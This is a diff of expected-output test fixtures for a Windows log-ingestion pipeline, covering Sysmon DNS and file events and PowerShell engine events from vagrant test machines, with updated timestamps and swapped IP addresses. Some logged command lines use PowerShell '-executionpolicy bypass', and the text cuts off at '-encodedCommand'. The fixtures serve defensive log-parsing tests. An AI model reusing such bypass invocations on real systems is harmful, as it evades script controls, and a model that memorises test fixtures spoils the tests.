"\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e32\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Storage\\ext\\gfdkimpbcpahaombhbimeihdjnejgicl\\def\\ee4a6e45-bffd-49f4-98ae-32aebcc890b5.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:05.339\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21853,11 +21581,11 @@ "type": "CNAME" }, { - "data": "40.121.17.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -21865,7 +21593,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -21873,7 +21601,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -21882,12 +21610,12 @@ } ], "resolved_ip": [ - "40.121.17.79", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, @@ -21905,19 +21633,19 @@ "c.urs.microsoft.com" ], "ip": [ - "40.121.17.79", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.314007688Z", + "ingested": "2021-12-09T13:49:44.740155100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:49:52.105Z", diff --git a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json index 051e1de4c0f..ba9b68dedcd 100644 --- a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json @@ -47,7 +47,7 @@ }, "event": { "sequence": 35, - "ingested": "2021-06-14T13:23:14.028841700Z", + "ingested": "2021-12-09T13:50:22.454903100Z", "code": "600", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e600\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e6\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T13:21:43.183180900Z'/\u003e\u003cEventRecordID\u003e1089\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eCertificate\u003c/Data\u003e\u003cData\u003eStarted\u003c/Data\u003e\u003cData\u003e\tProviderName=Certificate\n\tNewProviderState=Started\n\n\tSequenceNumber=35\n\n\tHostName=Windows PowerShell ISE Host\n\tHostVersion=5.1.17763.1007\n\tHostId=86edc16f-6943-469e-8bd8-ef1857080206\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe C:\\Users\\vagrant\\Desktop\\lateral.ps1\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=9d21da0b-e402-40e1-92ff-98c5ab1137a9\n\tPipelineId=15\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e600\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e6\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-13T13:25:04.656426900Z'/\u003e\u003cEventRecordID\u003e1266\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eRegistry\u003c/Data\u003e\u003cData\u003eStarted\u003c/Data\u003e\u003cData\u003e\tProviderName=Registry\n\tNewProviderState=Started\n\n\tSequenceNumber=1\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=44b8d66c-f5a2-4abb-ac7d-6db73990a6d3\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e600\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e6\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-06-04T07:25:04.857430200Z'/\u003e\u003cEventRecordID\u003e18640\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eCertificate\u003c/Data\u003e\u003cData\u003eStarted\u003c/Data\u003e\u003cData\u003e\tProviderName=Certificate\n\tNewProviderState=Started\n\n\tSequenceNumber=8\n\n\tHostName=ConsoleHost\n\tHostVersion=2.0\n\tHostId=99a16837-7392-463d-afe5-5f3ed24bd358\n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "PowerShell", @@ -103,7 +103,7 @@ }, "event": { "sequence": 13, - "ingested": "2021-06-14T13:23:14.028855300Z", + "ingested": "2021-12-09T13:50:22.454906900Z", "code": "400", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e400\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T07:00:30.891423500Z'/\u003e\u003cEventRecordID\u003e1492\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003eNone\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ServerRemoteHost\n\tHostVersion=1.0.0.0\n\tHostId=2458050c-5e21-47a6-bbdf-41ef2151b519\n\tHostApplication=C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=405e84eb-9ca3-40d8-a4da-cf6ed1b38ed2\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e400\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T07:01:14.371507600Z'/\u003e\u003cEventRecordID\u003e1511\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003eNone\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=83c6a631-910d-4530-bec2-18b2d0fc380a\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=056a5045-a7bb-49c6-9a9d-2ea95acea751\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e400\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:32:51.989256800Z'/\u003e\u003cEventRecordID\u003e1579\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003eNone\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=Windows PowerShell ISE Host\n\tHostVersion=5.1.17763.1007\n\tHostId=f3d0acd6-4ec1-4e0a-9c8e-27ee07eec3ab\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe C:\\Users\\vagrant\\Desktop\\patata.ps1\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=24067d05-e98a-4fbb-9cda-020e4c65017d\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e400\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-06-04T07:20:27.747227500Z'/\u003e\u003cEventRecordID\u003e18591\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003eNone\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=9\n\n\tHostName=ConsoleHost\n\tHostVersion=2.0\n\tHostId=7018c049-c75b-4e02-9c0f-6761b97e1657\n\tEngineVersion=2.0\n\tRunspaceId=6ebeca05-d618-4c66-a0d8-4269d800d099\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "PowerShell", @@ -205,7 +205,7 @@ }, "event": { "sequence": 17, - "ingested": "2021-06-14T13:23:14.028864100Z", + "ingested": "2021-12-09T13:50:22.454911400Z", "code": "800", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e800\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e8\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-02-26T09:37:40.487241500Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant-2019\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003e Add-Type -AssemblyName System.IO.Compression.FileSystem\n\u003c/Data\u003e\u003cData\u003e\tDetailSequence=1\n\tDetailTotal=1\n\n\tSequenceNumber=17\n\n\tUserId=VAGRANT-2019\\vagrant\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=ac3c99ce-7983-4996-807e-6a689eaba50b\n\tHostApplication=powershell -executionpolicy bypass \u0026amp; { if (Test-Path variable:global:ProgressPreference){set-variable -name variable:global:ProgressPreference -value 'SilentlyContinue'};. c:/Windows/Temp/packer-ps-env-vars-5e5637dd-15a9-73e0-889a-c01f541a8bc6.ps1; \u0026amp;'c:/Windows/Temp/script-5e5637dd-5626-019d-027a-02e78baaacc9.ps1'; exit $LastExitCode }\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=6a447a2c-693e-4d41-948d-129b455b2569\n\tPipelineId=1\n\tScriptName=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psm1\n\tCommandLine= Add-Type -AssemblyName System.IO.Compression.FileSystem\n\u003c/Data\u003e\u003cData\u003eCommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression.FileSystem\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e800\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e8\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:33:26.376993100Z'/\u003e\u003cEventRecordID\u003e1843\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003e\u0026amp; { Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }\u003c/Data\u003e\u003cData\u003e\tDetailSequence=1\n\tDetailTotal=1\n\n\tSequenceNumber=135\n\n\tUserId=VAGRANT\\vagrant\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=aae5217d-054f-435f-9968-4b5bebf12116\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=a87e8389-57c7-4997-95ff-f82f644965bf\n\tPipelineId=71\n\tScriptName=\n\tCommandLine=\u0026amp; { Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }\u003c/Data\u003e\u003cData\u003eCommandInvocation(Set-StrictMode): \"Set-StrictMode\"\nParameterBinding(Set-StrictMode): name=\"Version\"; value=\"1.0\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e800\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e8\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:33:26.393089000Z'/\u003e\u003cEventRecordID\u003e1846\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eImport-LocalizedData LocalizedData -filename ArchiveResources\n\u003c/Data\u003e\u003cData\u003e\tDetailSequence=1\n\tDetailTotal=1\n\n\tSequenceNumber=141\n\n\tUserId=VAGRANT\\vagrant\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=aae5217d-054f-435f-9968-4b5bebf12116\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=a87e8389-57c7-4997-95ff-f82f644965bf\n\tPipelineId=71\n\tScriptName=\n\tCommandLine=Import-LocalizedData LocalizedData -filename ArchiveResources\n\u003c/Data\u003e\u003cData\u003eCommandInvocation(Import-LocalizedData): \"Import-LocalizedData\"\nParameterBinding(Import-LocalizedData): name=\"FileName\"; value=\"ArchiveResources\"\nParameterBinding(Import-LocalizedData): name=\"BindingVariable\"; value=\"LocalizedData\"\nNonTerminatingError(Import-LocalizedData): \"Cannot find the Windows PowerShell data file 'ArchiveResources.psd1' in directory 'C:\\Gopath\\src\\github.com\\elastic\\beats\\x-pack\\winlogbeat\\en-US\\', or in any parent culture directories.\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e800\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e8\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:33:26.393089000Z'/\u003e\u003cEventRecordID\u003e1847\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003e\u003c/Data\u003e\u003cData\u003e\tDetailSequence=1\n\tDetailTotal=1\n\n\tSequenceNumber=143\n\n\tUserId=VAGRANT\\vagrant\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=aae5217d-054f-435f-9968-4b5bebf12116\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command 'C:\\Gopath\\src\\github.com\\elastic\\beats'\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=a87e8389-57c7-4997-95ff-f82f644965bf\n\tPipelineId=71\n\tScriptName=\n\tCommandLine=\u003c/Data\u003e\u003cData\u003eCommandInvocation(Out-Default): \"Out-Default\"\nParameterBinding(Out-Default): name=\"InputObject\"; value=\"Cannot find the Windows PowerShell data file 'ArchiveResources.psd1' in directory 'C:\\Gopath\\src\\github.com\\elastic\\beats\\x-pack\\winlogbeat\\en-US\\', or in any parent culture directories.\"\n\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "PowerShell", @@ -261,7 +261,7 @@ }, "event": { "sequence": 33, - "ingested": "2021-06-14T13:23:14.028872600Z", + "ingested": "2021-12-09T13:50:22.454914900Z", "code": "403", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e403\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T15:31:22.426923800Z'/\u003e\u003cEventRecordID\u003e1687\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eStopped\u003c/Data\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Stopped\n\tPreviousEngineState=Available\n\n\tSequenceNumber=33\n\n\tHostName=Windows PowerShell ISE Host\n\tHostVersion=5.1.17763.1007\n\tHostId=1929aa68-472a-404a-8ead-96bd7b49f2db\n\tHostApplication=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=6f14a54e-5992-42dd-b38c-68830a28b1b6\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e403\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:11:47.932007000Z'/\u003e\u003cEventRecordID\u003e1706\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eStopped\u003c/Data\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Stopped\n\tPreviousEngineState=Available\n\n\tSequenceNumber=37\n\n\tHostName=ServerRemoteHost\n\tHostVersion=1.0.0.0\n\tHostId=ed57761b-ba0f-4d11-87d9-fac33820d20e\n\tHostApplication=C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n\tEngineVersion=5.1.17763.1007\n\tRunspaceId=0729459a-8646-4176-8b02-024421a9632e\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='PowerShell'/\u003e\u003cEventID Qualifiers='0'\u003e403\u003c/EventID\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cKeywords\u003e0x80000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-15T08:28:53.626698200Z'/\u003e\u003cEventRecordID\u003e1766\u003c/EventRecordID\u003e\u003cChannel\u003eWindows PowerShell\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData\u003eStopped\u003c/Data\u003e\u003cData\u003eAvailable\u003c/Data\u003e\u003cData\u003e\tNewEngineState=Stopped\n\tPreviousEngineState=Available\n\n\tSequenceNumber=37\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.17763.1007\n\tHostId=f9cd0d65-6665-4b88-9142-f03a2d20f8b8\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -executionpolicy bypass -encodedCommand 